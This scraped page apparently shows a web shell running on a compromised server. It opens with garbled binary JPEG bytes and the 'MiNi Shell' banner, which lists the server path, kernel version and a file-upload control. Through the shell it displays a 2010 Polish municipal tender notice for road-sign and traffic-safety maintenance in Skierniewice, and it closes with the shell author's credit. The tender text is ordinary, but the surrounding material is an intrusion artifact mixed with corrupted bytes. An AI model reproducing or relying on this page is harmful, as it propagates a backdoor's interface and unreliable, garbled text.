JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100223/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20100223/37747-N-2010.html

<p class="kh_header"><b>Skierniewice: Przetarg nieograniczony na konserwację i odnawianie znaków drogowych pionowych oraz urządzeń bezpieczeństwa ruchu na ulicach miasta Skierniewice.</b><br>
<b>Numer ogłoszenia: 37747 - 2010; data zamieszczenia: 23.02.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Miasta Skierniewice , ul. Rynek 1, 96-100 Skierniewice, woj. łódzkie, tel. 046 8345100, faks 046 8345151.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.um.skierniewice.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przetarg nieograniczony na konserwację i odnawianie znaków drogowych pionowych oraz urządzeń bezpieczeństwa ruchu na ulicach miasta Skierniewice..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest konserwacja i odnawianie znaków drogowych pionowych oraz urządzeń bezpieczeństwa ruchu na ulicach miasta Skierniewice.
TECHNOLOGIA     R O B Ó T
1.	Przekręcenie tarczy znaku
Zakres robót obejmuje:
-	przekręcanie tarczy znaku,
-	odkręcenie śrub, założenie podkładki usztywniającej, dokręcenie śrub. 
W ofercie należy podać cenę jednostkową zadania.
2.	Prostowanie słupka w ofercie należy podać cenę jednostkową zadania.
3.	Mycie tarcz znaków
Zakres robót obejmuje: 
-	ręczne lub mechaniczne umycie tarczy lub tablicy wodą z płynem czyszczącym.
W ofercie należy podać cenę jednostkową zadania.
4.	Zamontowanie i demontaż oznakowania tymczasowego, tarczy znaku odblaskowego, (materiał Wykonawcy)
Zakres robót obejmuje: 
-	montaż tarczy znaku przy użyciu obejm
-	demontaż tarczy znaku 
W ofercie należy podać cenę jednostkową zadania uwzględniając koszt wypożyczenie tarcz znaków.
5.	Zamontowanie tarczy znaku odblaskowego (materiał Wykonawcy)
Zakres robót obejmuje: 
-	montaż tarczy znaku przy użyciu obejm typowych i śrub lub taśmy bandimex.
W ofercie należy podać cenę jednostkową zadania.
6.	Zabetonowanie lub przebetonowanie słupka, 
Zakres robót obejmuje: 
-	rozbiórka chodnika w miejscu wykopu,
-	wykonanie wykopu 30cm/30cm/70cm,
-	ustawienie słupka w pionie,
-	zabetonowanie słupka o o 60 mm dł. 3,40m, 4,00m lub 4,40m (słupek zamawiającego lub Wykonawcy) w bloku betonowym z betonu B-10 o wymiarach 30cmx30cmx70cm (70 cm głębokość wykopu pod beton) 
-	wywóz nadmiaru gruntu we własne miejsce składowania Wykonawcy,
-	ułożenie nawierzchni chodnika,
W ofercie należy podać cenę jednostkową zadania.

7.	Demontaż słupka,
- rozbiórka chodnika w miejscu ustawienia słupka,
- wycięcie słupka O 60mm dł. 3,40m, 4,0m, 4,40m,
- ułożenie naruszonej nawierzchni chodnika,

8.	Renowacja - naprawa 1m2 tablicy drogowskazowej obejmuje:
-	oczyszczenie obu stron tablicy z zanieczyszczeń i rdzy,
-	malowanie tyłu tablicy farbą podkładową i szarą wierzchnią, odpornymi na warunki atmosferyczne,
-	naklejanie tła z folii samoprzylepnej odblaskowej, naklejanie symboli z folii samoprzylepnej,

9. Renowacja - naprawa tarczy znaku wszystkich kategorii obejmuje:
-	 oczyszczenie obu stron tarczy z zanieczyszczeń i rdzy,
-	 malowanie tyłu tarczy farbą podkładową i farbą szarą, odpornymi na warunki atmosferyczne,
-	 naklejanie tła z folii samoprzylepnej odblaskowej, naklejanie symboli z folii samoprzylepnej,
Należy podać cenę renowacji 1m2 tarczy znaku lub tablicy drogowskazowej.
10. Montaż 1 szt. tablicy nazwy ulicy na murze, słupku lub ogrodzeniu.
W zakres robót wchodzi zamontowanie 1 szt. tablicy z nazwą ulicy
-	na murze za pomocą kołków rozporowych (materiał własny wykonawcy)
-	na słupku za pomocą obejm (materiał własny wykonawcy),
-	na ogrodzeniu za pomocą taśmy stalowej typu bandimex (materiał własny wykonawcy).
W ofercie należy podać cenę jednostkową zadania.

11. Renowacja 1 szt. słupka metalowego pod znak.
-	oczyszczenie słupka z zanieczyszczeń i rdzy,
-	malowanie dwukrotne słupka farbą szarą, odporną na warunki atmosferyczne (materiał własny wykonawcy),
W ofercie należy podać cenę jednostkową renowacji 1 szt. słupka metalowego.

12. Montaż 1m ogrodzenia łańcuchowego U-12b (materiał i robocizna - wykonawcy robót) obejmuje:
-	rozbiórka chodnika,
-	zabetonowanie słupka  o dł. 1,80m (słupek Wykonawcy) w bloku betonowym 
z betonu B-10 o wymiarach 30cm/30cm/70cm (70 cm głębokość wykopu pod beton) 
-	wywóz nadmiaru gruntu,
-	montaż łańcuchów dł. 1,50m do słupków,
-	ułożenie nawierzchni chodnika,
13.	Renowacja 1szt. ogrodzenia łańcuchowego U-12b obejmuje:
- oczyszczenie słupka z zanieczyszczeń i rdzy.
- malowanie słupka farbą podkładową i farbą o kolorze białym i czerwonym. ( odporną na warunki atmosferyczne)
(Należy podać ceny renowacji 1szt. słupka metalowego.)

14. Montaż 1m balustrady U-11a (materiał i robocizna - wykonawcy robót) obejmuje:
-	rozbiórka chodnika,
-	zabetonowanie słupków (słupek Wykonawcy) w bloku betonowym z betonu B-10 
o wymiarach 30cmx30cmx70cm (70 cm głębokość wykopu pod beton) 
-	wywóz nadmiaru gruntu,
-	montaż bariery dł. 2,0m,
-	ułożenie nawierzchni chodnika,

15. Montaż 1mb stalowej bariery ochronnej U-14a (materiał i robocizna wykonawcy robót, prowadnica zamawiającego, materiał własny wykonawcy), obejmuje:
-	rozbiórka chodnika,
-	zabetonowanie słupka  (profilu) (słupek Wykonawcy) w bloku betonowym 
z betonu B-10 o wymiarach 30cmx30cmx70cm (70 cm głębokość wykopu pod beton) 
-	wywóz nadmiaru gruntu,
-	montaż bariery stalowej do słupków,
-	ułożenie nawierzchni chodnika,
16. Demontaż 1mb stalowej bariery ochronnej U-14a obejmuje:
- rozbiórka chodnika,
- demontaż pasa profilowanego,
- demontaż prowadnicy,
- demontaż słupka,
- ułożenie naruszonej nawierzchni chodnika,
- wywóz nadmiaru gruntu we własne miejsce składowania Wykonawcy.
17. Montaż wysięgnika rurowego
- przez wysięgnik rurowy rozumie się urządzenia służące  do przymocowania na innym   nośniku, np. na słupku sygnalizacji świetlnej uchwytu do montażu dodatkowych znaków pionowych.
18. Montaż lustra drogowego U-18a, U-18b
- przygotowanie podłoża do montażu lustra drogowego,
- wyznaczenie miejsca montażu,
- zabetonowanie słupków montażowych,
- przytwierdzenie luster drogowych z odpowiednim ustawieniem kierunkowym;
19. Montaż progu zwalniającego listwowego U-16d
- przygotowanie podłoża do montażu progu zwalniającego,
- wyznaczenie miejsca montażu,
- przytwierdzenie elementów progu zwalniającego do jezdni asfaltowej śrubami rozporowymi;
20. Demontaż 1mb ogrodzenia segmentowego U-12a, obejmuje:
- rozbiórka chodnika,
- demontaż słupka oraz segmentu ogrodzenia,
- ułożenie naruszonej nawierzchni chodnika,
21. Montaż konstrukcji kratowej, z rur stalowych ocynkowanych ogniowo o średnicy O50mm, O60mm skratowanych kraty typu N, obejmuje:
- rozbiórka chodnika,
- wykonanie wykopu 30x30x70cm,
- ustawienie konstrukcji kratowej w pionie,
- zabetonowanie konstrukcji (rury o średnicy O50 i O60), w bloku betonowym z betonu B-10 
o wymiarach 30x30x70cm
- wywóz nadmiaru gruzu we własne miejsce składowania Wykonawcy,
- ułożenie nawierzchni chodnika.
22. Demontaż konstrukcji kratowej obejmuje:
- rozbiórkę chodnika,
- wycięcie rur O50 lub O60mm,
- ułożenie naruszonej nawierzchni chodnika.
Wszystkie ceny winny zawierać koszty materiałów, transportu materiałów i dojazdu osób wykonujących roboty.
UWAGA - 	odnawiane wzory starych znaków oraz ich umiejscowienie w terenie winny być zgodne z Instrukcją o znakach drogowych pionowych 
Znaki i inne elementy oznakowania pionowego muszą spełniać następujące parametry   techniczne :
a.	Symbole i rozmiary znaków winny być zgodne z szczegółowymi warunkami technicznymi dla znaków i sygnałów drogowych oraz urządzeń bezpieczeństwa ruchu drogowego i warunki ich umieszczania na drogach (Załącznik do Dz.U. z 2003r. Nr 220 poz. 2181)
b.	Symbole znaków winny być wykonane metodą sitodruku. Do sitodruku stosowane będą farby zalecane przez producenta folii.
c.	Znaki drogowego, na które nie ma normy,  muszą posiadać deklarację zgodności z aprobatą techniczną wydaną przez uprawnioną jednostkę. 
d.	Znaki i tablice winny być ocechowane w sposób trwały, pozwalający na :
-	identyfikację producenta,
-	datę produkcji znaku.
e.	Znaki i tablice należy wykonać:
-	 z folii odblaskowej I generacji, a dla znaków A-7, B-2, B-20, D-6, D-6a, D-6b z folii odblaskowej II generacji o parametrach odpowiadających folii 3M lub podobnych posiadającej trwałe cechy identyfikacyjne producenta folii oraz rok produkcji. Minimalny wymagany okres gwarancji - 7 lat. 
f.	Producent znaków winien posiadać świadectwa autoryzacji wydane przez producenta folii  gwarantujące właściwe jej stosowanie oraz aplikację.
g.	Tarcze znaków i tablic należy wykonać z blachy ocynkowanej ogniowo o grubości 1,25 lub 1,50 mm. Tylna strona tarczy znaków i tablic winna być zabezpieczona przed korozją poprzez malowanie farbą proszkową barwy szarej neutralnej o współczynniku luminacji 0,08 - 0,10 (wg wzorca stanowiącego załącznik do Instrukcji o Znakach Drogowych Pionowych). Powłoka farby winna posiadać grubość min. 60 mikronów.
h.	Tarcza znaku powinna być wykonana z jednolitego materiału i mieć podwójnie zagięcie na całym obwodzie (także na narożach)
i.	Wymagane jest, aby tarcze znaków posiadały profile montażowe i usztywniające. Profile usztywniające powinny być dostosowane do montażu uchwytów lub taśm stalowych bez konieczności stosowania dodatkowych uchwytów lub elementów łączących.
j.	Tarcze jednostronne znaków kierunku i miejscowości E i F wykonane jako składane segmentowe. Panele powinny posiadać krawędzie podwójnie gięte, będące jednocześnie elementem montażowym.
k.	Nie dopuszcza się takich mocowań tarcz znaków oraz tablic, w których następowałoby jakiekolwiek przewiercenie tarcz na wylot.
l.	Uchwyty do mocowania tarcz znaków i tablic wykonane z blach stalowych o grubości min 4mm zabezpieczone antykorozyjnie metodą cynkowania ogniowego.
m.	Elementy złączne winny posiadać zabezpieczenia, aby uniemożliwić obracanie tarcz lub demontaż przez osoby nieupoważnione.
n.	Słupki do znaków i tablic i tablic o średnicy zewnętrznej 60mm, powinny posiadać dekle od góry. W dolnej części słupki muszą posiadać elementy blokujące w gruncie, uniemożliwiające jego ręczne wyrwanie z gruntu bez rozkopywania lub jego obrócenie. Słupki jak i konstrukcje wsporcze muszą mieć barwę szarą (dopuszczalna jest barwa powłoki cynkowej). Wymagany minimalny okres gwarancji na słupki - 2 lata.
o.	Kratownice o średnicy O50mm i O60mm, powinny być wykonane z rur stalowych ocynkowanych ogniowo. Rury powinny posiadać dekle od góry oraz elementy blokujące 
w gruncie, uniemożliwiające ich ręczne wyrwanie z gruntu bez rozkopywania lub jego obrócenia. Wymagany minimalny okres gwarancji na kratownice - 5 lat..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 50.23.00.00-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.03.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 10.	Wymagania dotyczące wadium

10.1. Wykonawca przystępujący do przetargu jest obowiązany wnieść wadium w wysokości: 
  1 200,00 zł (słownie: jeden tysiąc dwieście zł). w terminie do dnia 03.03.2010 r. do godz. 9:50  
10.2. Wadium może być wniesione w następujących formach: 
- pieniądzu, na rachunek nr konta: KREDYT  BANK S.A. oddział w Skierniewicach nr 42 1500 1689 1216 8004 0851 0000 z  dopiskiem Km - wadium - Konserwacja oznakowania pionowego 2010.
- poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, 
z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym, 
- gwarancjach bankowych, 
- gwarancjach ubezpieczeniowych, 
- poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy 
z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości. 
10.3. Wadium wnosi się przed upływem terminu składania ofert.
10.4. Wadium wnoszone w formie: poręczenia bankowego, gwarancji bankowych lub gwarancji 
ubezpieczeniowych należy złożyć w oryginale w siedzibie Zamawiającego w kasie. 
10.5. Za skutecznie wniesione wadium w pieniądzu Zamawiający uważa wadium, które do dnia 03.03.2010 r., do godz. 09:50 włącznie, znajdzie się na koncie Zamawiającego. 
10.6. Zamawiający zwraca wadium w przypadkach określonych w art. 46 ustawy Prawo zamówień publicznych
10.7. Wykonawca, który nie wniesie wadium na zasadach określonych w SIWZ zostanie wykluczony z postępowania.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Posiadają polisę ubezpieczeniowa od odpowiedzialności cywilnej 
w zakresie prowadzonej działalności gospodarczej na kwotę minimum 50 000zł (słownie: pięćdziesiąt tysięcy złotych 00/100) na cały okres obowiązywania umowy.
Ocena spełnienia warunków wymaganych od Wykonawcy zostanie dokonana wg formuły spełnia - nie spełnia 
Nie spełnienie chociażby jednego warunku skutkować będzie wykluczeniem Wykonawcy z postępowania.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>11.1.	Ofertę wykonawcy - wg załącznika nr 1 do SIWZ
Oświadczenie w sprawie akceptacji warunków umowy na wykonanie zadania  w tym:
udzielenie gwarancji i zobowiązanie do realizacji zadania w terminie określonym w pkt. 4  SIWZ - wg  załącznika nr 4 do SIWZ 
Minimalny wymagany przez Zamawiającego okres gwarancji 12 miesięcy, liczony od daty odbioru  robót objętych kolejnym zgłoszeniem. Treść warunków umowy została zawarta w załączniku nr 5 do SIWZ.

11.11. W przypadku wykonawców występujących wspólnie na podstawie art. 23 ustawy do   oferty należy dołączyć dokumenty:  
1.	Umowę o zawiązaniu konsorcjum, w której strony zobowiążą się do złożenia oferty wspólnej, która będzie szczegółowo określać przedmiot działalności, prawa i obowiązki wszystkich członków Konsorcjum, solidarną odpowiedzialność każdego członka konsorcjum wobec Zamawiającego, wykazywać jeden podmiot wiodący (lidera), zasady reprezentacji w sposób nie budzący wątpliwości oraz czas trwania konsorcjum, zakres uczestnictwa w konsorcjum, sposób prowadzenia spraw konsorcjum, określenie sposobu ustania konsorcjum, 
2.	Pełnomocnictwo do reprezentowania w postępowaniu o udzielenie zamówienia publicznego, o którym mowa w art. 23 ustawy, 
3.	dokumenty wymienione w pkt. 11.4, 11.5, 11.6, 11.8, muszą być złożone przez każdy podmiot wchodzący w skład konsorcjum.
4.	dokumenty wymienione w pkt. 11.1, 11.2, (w formie innej niż pieniądz), 11.3 podmioty składają wspólnie jako konsorcjum.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.um.skierniewice.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urzad Miasta Skierniewice, ul. Rynek 1, 96-100 Skierniewice Wydział Komunikacji.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 03.03.2010 godzina 09:50, miejsce: Sekretariat Urzędu Miasta Skierniewice, ul. Rynek 1, pok. nr 14..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com